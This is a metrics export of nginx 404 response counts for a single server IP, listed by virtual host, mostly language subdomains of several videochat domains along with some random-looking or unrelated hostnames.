nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="httpgl.videochat.mx"} 42 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="htxkwpap.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="hu.videochat.cafe"} 3259 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="hu.videochat.date"} 2641 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="hu.videochat.mx"} 3555 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="hu.videochat.show"} 192 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="hu.videochat.tv.br"} 2382 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="hu.videochat.world"} 4964 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="i.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="icanhazip.com"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="id.videochat.cafe"} 1732 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="id.videochat.date"} 147 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="id.videochat.mx"} 4789 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="id.videochat.show"} 434 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="id.videochat.tv.br"} 1726 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="id.videochat.world"} 5188 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ilfpehr.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="image.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="images.videochat.mx"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="img.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ip-api.com"} 61 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="is.videochat.cafe"} 1806 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="is.videochat.date"} 481 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="is.videochat.mx"} 4539 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="is.videochat.show"} 392 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="is.videochat.tv.br"} 2814 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="is.videochat.world"} 3400 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="it.videochat.cafe"} 1630 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="it.videochat.date"} 3337 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="it.videochat.mx"} 5111 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="it.videochat.show"} 451 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="it.videochat.tv.br"} 1790 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="it.videochat.world"} 4254 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="jaiyuba.videochat.mx"} 694 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="jetwmkn.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="jicuu.wsqgdyldaaqgiustqkamqseil.org"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="jp.videochat.cafe"} 1900 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="jp.videochat.date"} 3864 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="jp.videochat.mx"} 4250 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="jp.videochat.show"} 434 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="jp.videochat.tv.br"} 1595 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="jp.videochat.world"} 4030 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="jsowxkk.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="jutvtfa.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="jv.videochat.cafe"} 1644 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="jv.videochat.date"} 847 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="jv.videochat.mx"} 5478 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="jv.videochat.show"} 500 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="jv.videochat.tv.br"} 3885 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="jv.videochat.world"} 1484 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="jwmgykm.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ka.videochat.cafe"} 3292 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ka.videochat.date"} 141 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ka.videochat.mx"} 5608 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ka.videochat.show"} 455 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ka.videochat.tv.br"} 2367 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ka.videochat.world"} 2013 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="kbmjvka.videochat.mx"} 533 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="kctjjudm.videochat.mx"} 641 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="kibcumk.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="kjjlaro.videochat.mx"} 636 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="kk.videochat.cafe"} 1692 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="kk.videochat.date"} 325 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="kk.videochat.mx"} 5572 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="kk.videochat.show"} 312 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="kk.videochat.tv.br"} 2103 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="kk.videochat.world"} 3757 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="km.videochat.cafe"} 1665 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="km.videochat.date"} 210 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="km.videochat.mx"} 5411 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="km.videochat.show"} 126 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="km.videochat.tv.br"} 2993 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="km.videochat.world"} 2891 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="kn.videochat.cafe"} 2192 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="kn.videochat.date"} 348 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="kn.videochat.mx"} 4394 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="kn.videochat.show"} 179 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="kn.videochat.tv.br"} 3795 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="kn.videochat.world"} 3475 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ko.videochat.cafe"} 1650 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ko.videochat.date"} 3540 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ko.videochat.mx"} 5429 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ko.videochat.show"} 349 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ko.videochat.tv.br"} 1846 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ko.videochat.world"} 3280 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ky.videochat.cafe"} 1680 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ky.videochat.date"} 307 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ky.videochat.mx"} 5422 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ky.videochat.show"} 490 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ky.videochat.tv.br"} 2040 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ky.videochat.world"} 3135 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="laqpsam.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="lb.videochat.cafe"} 1665 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="lb.videochat.date"} 563 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="lb.videochat.mx"} 4423 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="lb.videochat.show"} 387 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="lb.videochat.tv.br"} 1885 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="lb.videochat.world"} 3227 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="lcihlsv.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="lekker-lopeaf.videochat.mx"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="lhuqozrhffuzjrval.videochat.mx"} 65 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="linderafashionstylgl.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="lizfgda.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="lo.videochat.cafe"} 1631 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="lo.videochat.date"} 380 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="lo.videochat.mx"} 6307 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="lo.videochat.show"} 245 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="lo.videochat.tv.br"} 1961 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="lo.videochat.world"} 2943 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="localhost"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="login.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="lt.videochat.cafe"} 1859 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="lt.videochat.date"} 4304 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="lt.videochat.mx"} 5108 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="lt.videochat.show"} 120 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="lt.videochat.tv.br"} 1971 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="lt.videochat.world"} 3359 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="lv.videochat.cafe"} 1650 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="lv.videochat.date"} 4433 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="lv.videochat.mx"} 6289 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="lv.videochat.show"} 395 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="lv.videochat.tv.br"} 1960 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="lv.videochat.world"} 4066 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="mail.videochat.mx"} 1220 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="mcaydel.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="mdpmqfi.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="media.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="meta.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="mg.videochat.cafe"} 2209 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="mg.videochat.date"} 745 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="mg.videochat.mx"} 4947 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="mg.videochat.show"} 210 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="mg.videochat.tv.br"} 2080 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="mg.videochat.world"} 4424 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="mi.videochat.cafe"} 1851 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="mi.videochat.date"} 404 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="mi.videochat.mx"} 5300 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="mi.videochat.show"} 276 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="mi.videochat.tv.br"} 1877 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="mi.videochat.world"} 1434 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="mj.game"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="mk.videochat.cafe"} 1714 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="mk.videochat.date"} 3451 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="mk.videochat.mx"} 4629 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="mk.videochat.show"} 194 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="mk.videochat.tv.br"} 1752 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="mk.videochat.world"} 3287 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ml.videochat.cafe"} 1674 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ml.videochat.date"} 466 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ml.videochat.mx"} 5737 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ml.videochat.show"} 95 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ml.videochat.tv.br"} 1374 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ml.videochat.world"} 3378 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="mn.videochat.cafe"} 1720 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="mn.videochat.date"} 417 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="mn.videochat.mx"} 5487 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="mn.videochat.show"} 363 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="mn.videochat.tv.br"} 1878 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="mn.videochat.world"} 1940 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="mpositesmodeca.videochat.mx"} 32 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="mr.videochat.cafe"} 2869 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="mr.videochat.date"} 102 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="mr.videochat.mx"} 5048 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="mr.videochat.show"} 395 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="mr.videochat.tv.br"} 1903 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="mr.videochat.world"} 3553 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="mrj.videochat.cafe"} 1922 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="mrj.videochat.date"} 479 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="mrj.videochat.mx"} 5334 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="mrj.videochat.show"} 310 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="mrj.videochat.tv.br"} 1809 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="mrj.videochat.world"} 1579 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ms.videochat.cafe"} 1550 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ms.videochat.date"} 482 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ms.videochat.mx"} 5329 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ms.videochat.show"} 179 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ms.videochat.tv.br"} 1933 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ms.videochat.world"} 4189 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="mt.videochat.cafe"} 2945 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="mt.videochat.date"} 517 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="mt.videochat.mx"} 9075 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="mt.videochat.show"} 253 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="mt.videochat.tv.br"} 2198 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="mt.videochat.world"} 4394 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="my.videochat.cafe"} 1517 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="my.videochat.date"} 115 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="my.videochat.mx"} 3920 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="my.videochat.show"} 472 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="my.videochat.tv.br"} 1555 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="my.videochat.world"} 2614 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="n1ccc.com"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="nad.mj.game"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="nd-homes-vi.videochat.mx"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ne.videochat.cafe"} 1670 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ne.videochat.date"} 1178 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ne.videochat.mx"} 8544 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ne.videochat.show"} 420 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ne.videochat.tv.br"} 2207 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ne.videochat.world"} 3064 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="neiljno.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="new.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="news.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ngydkta.videochat.mx"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="nkkeois.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="nl.videochat.cafe"} 1799 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="nl.videochat.date"} 397 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="nl.videochat.mx"} 5925 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="nl.videochat.show"} 187 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="nl.videochat.tv.br"} 2132 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="nl.videochat.world"} 3351 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="no.videochat.cafe"} 1735 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="no.videochat.date"} 2325 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="no.videochat.mx"} 7483 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="no.videochat.show"} 378 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="no.videochat.tv.br"} 1947 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="no.videochat.world"} 3222 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="nsgqffa.videochat.mx"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="oijqaeo.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="oknfzen.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="old.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="omfgchr.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="omsco.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="one-api.ir"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="orientalcarpetcreationbbluebasilbrohml.videochat.mx"} 43 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="orvzqhe.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="osu.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="owa.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="oygzjsr.videochat.mx"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="pa.videochat.cafe"} 1486 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="pa.videochat.date"} 176 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="pa.videochat.mx"} 4636 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="pa.videochat.show"} 376 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="pa.videochat.tv.br"} 1689 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="pa.videochat.world"} 1933 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="paosgi.com"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="pap.videochat.cafe"} 1466 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="pap.videochat.date"} 325 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="pap.videochat.mx"} 5715 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="pap.videochat.show"} 163 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="pap.videochat.tv.br"} 1728 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="pap.videochat.world"} 1395 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="pkiaram.videochat.mx"} 557 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="pl.videochat.cafe"} 3591 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="pl.videochat.date"} 3777 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="pl.videochat.mx"} 4290 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="pl.videochat.show"} 493 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="pl.videochat.tv.br"} 1657 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="pl.videochat.world"} 4094 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="portal.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="proxypool.top"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="pt.videochat.cafe"} 3115 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="pt.videochat.date"} 2204 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="pt.videochat.mx"} 5651 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="pt.videochat.show"} 256 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="pt.videochat.tv.br"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="pt.videochat.world"} 3744 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="qdjvhda.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="qdrqgda.videochat.mx"} 493 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="qexrhmt.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="qshicka.videochat.mx"} 636 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="qwctmaf.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="reiseservice-stender.videochat.mx"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ro.videochat.cafe"} 1863 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ro.videochat.date"} 4471 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ro.videochat.mx"} 9201 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ro.videochat.show"} 308 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ro.videochat.tv.br"} 1580 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ro.videochat.world"} 2048 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="rxwarht.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ryfusmrj.videochat.mx"} 653 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="s.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="s1.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="sco.videochat.cafe"} 1904 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="sco.videochat.date"} 188 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="sco.videochat.mx"} 9342 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="sco.videochat.show"} 265 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="sco.videochat.tv.br"} 1937 